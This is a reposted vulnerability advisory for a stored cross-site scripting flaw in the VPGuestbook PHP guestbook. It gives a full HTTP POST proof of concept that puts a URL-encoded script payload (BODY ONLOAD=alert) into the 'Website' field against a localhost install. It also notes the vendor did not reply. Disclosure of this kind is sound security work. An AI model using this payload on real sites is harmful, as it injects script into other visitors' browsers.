[转载]VPGuestbook跨站脚本攻击(XSS)以及测试方法

信息来源：contropotere.altervista.org

#1:. Background

[about]
A cool guestbook with many options such as : language files, smileys, ipban option, word filter, rating system, administration ... and more ... -Hotscripts.com-
[/about]

#2:. The Bug

The bug is caused by an insufficient filtering of user submitted input.A malicious user, could insert javascript code in the "Website" field when signing the guestbook.

#3:. PoC
[http post request]
POST http://127.0.0.1/vpguestbook/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/vpguestbook/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

nom=KingOfSka&email=&url=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&note=1&message=asdas&submit=Send
[/http post request]


#4:. Vendor Status / Patch :

Vendor contacted on 17/10 with e-mail, no response received yet.


#5:.

http://contropotere.altervista.o ... hp?a=forum&f=34 - Cpc Patching Forum , here you can ask for an unofficial patch
http://contropotere.altervista.o ... n/wrapper/Itemid/47 - Url, Bas64 and Hex Encoder/Decoder